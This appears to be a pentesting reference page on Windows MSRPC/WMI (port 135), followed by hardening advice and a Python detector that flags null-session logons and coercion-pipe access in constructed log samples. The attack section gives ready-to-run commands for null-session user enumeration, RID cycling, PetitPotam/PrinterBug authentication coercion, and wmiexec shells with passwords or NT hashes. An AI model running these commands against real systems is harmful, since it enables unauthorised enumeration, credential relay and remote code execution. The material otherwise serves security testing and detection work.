MSRPC / WMI
aka RPC, WMI, Endpoint Mapper
Windows RPC endpoint mapper on 135 (plus high dynamic ports). rpcclient enumerates users and shares over a null session, and wmiexec turns a credential into a shell.
Ports
| Port | Proto | Notes |
|---|---|---|
| 135 | tcp | RPC endpoint mapper |
| 49152 | tcp | start of the dynamic RPC range (to 65535) |
Fingerprint
- nmap msrpc on 135; impacket-rpcdump lists endpoints
- Often paired with 139/445 on Windows hosts
Default / weak creds
null session (sometimes), or any valid domain credential
Known CVEs
| CVE | Impact |
|---|---|
| PetitPotam / EfsRpc | RPC coercion of machine authentication for NTLM relay |
Exploitation primitives
- rpcclient null session: enumerate users, groups and RID-cycle
- wmiexec / wmiexec.py with a credential or hash for a semi-interactive shell
- RPC coercion (PetitPotam, PrinterBug) to force a host to authenticate to you
Overview
Port 135 is the RPC endpoint mapper that points clients at the dynamic high ports. For an attacker it is a user-enumeration surface (rpcclient) and an execution channel (WMI).
Enumeration
Dump the RPC endpoints:
impacket-rpcdump @<TARGET>
Null-session enumerate users:
rpcclient -U "" -N <TARGET>
Enumerate domain users (inside rpcclient):
enumdomusers
When enumdomusers is blocked, RID-cycle with lookupsid.py to recover usernames:
lookupsid.py <DOMAIN>/<user>:<pass>@<TARGET>
Coercion (force the host to authenticate to you)
PetitPotam (MS-EFSRPC) — relay or capture the machine’s NetNTLM:
python3 PetitPotam.py <YOUR_IP> <TARGET>
PrinterBug (MS-RPRN):
python3 printerbug.py <DOMAIN>/<user>:<pass>@<TARGET> <YOUR_IP>
Execution
Get a shell with a credential:
impacket-wmiexec <DOMAIN>/<user>:<pass>@<TARGET>
Pass-the-hash variant:
impacket-wmiexec -hashes :<NThash> <DOMAIN>/<user>@<TARGET>
Hardening
Restrict RPC to trusted hosts, disable null sessions, and patch the coercion vectors (PetitPotam/PrinterBug).
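Server-side, the null-session enumeration and the coercion primitives above leave distinct traces in the Security log: a network logon (4624, type 3) for ANONYMOUS LOGON, and an IPC$ share-access check (5145) whose target is one of the RPC named pipes the coercion tools use. The following detector is an added example, not code from the original page; the event records are constructed samples in a simplified JSON-lines shape, and the pipe list is an assumption based on the MS-EFSRPC and MS-RPRN endpoints discussed here.

```python
import json

# Named pipes reached through IPC$ by the coercion primitives on this page
# (efsrpc/lsarpc for MS-EFSRPC, spoolss for MS-RPRN). The set is an assumption
# for this example; tune it to the interfaces your hosts actually expose.
COERCION_PIPES = {"efsrpc", "lsarpc", "spoolss", "netlogon"}

def classify(ev):
    """Return a finding label for one Security-log event (dict), or None."""
    eid = ev.get("EventID")
    if (eid == 4624 and ev.get("LogonType") == 3
            and ev.get("TargetUserName", "").upper() == "ANONYMOUS LOGON"):
        # Null-session logon: what rpcclient -U "" -N looks like from the server
        return "null-session logon from %s" % ev.get("IpAddress", "?")
    if eid == 5145 and ev.get("ShareName", "").upper().endswith("IPC$"):
        pipe = ev.get("RelativeTargetName", "").lower()
        if pipe in COERCION_PIPES:
            return "coercion-prone pipe %s opened from %s by %s" % (
                pipe, ev.get("IpAddress", "?"), ev.get("SubjectUserName", "?"))
    return None

def scan(jsonl):
    """Run classify() over newline-delimited JSON events; return the findings."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        label = classify(json.loads(line))
        if label:
            findings.append(label)
    return findings

# Constructed sample events (not real telemetry), one JSON object per line.
# Raw string so the JSON escaping of "\\*\IPC$" survives intact.
SAMPLE = r"""
{"EventID": 4624, "LogonType": 3, "TargetUserName": "ANONYMOUS LOGON", "IpAddress": "10.0.0.50"}
{"EventID": 4624, "LogonType": 3, "TargetUserName": "alice", "IpAddress": "10.0.0.51"}
{"EventID": 5145, "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "efsrpc", "SubjectUserName": "bob", "IpAddress": "10.0.0.50"}
{"EventID": 5145, "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "srvsvc", "SubjectUserName": "bob", "IpAddress": "10.0.0.51"}
{"EventID": 5145, "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "spoolss", "SubjectUserName": "DC01$", "IpAddress": "10.0.0.52"}
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Event 5145 only appears when "Audit Detailed File Share" is enabled, so confirm that audit policy before relying on the pipe check.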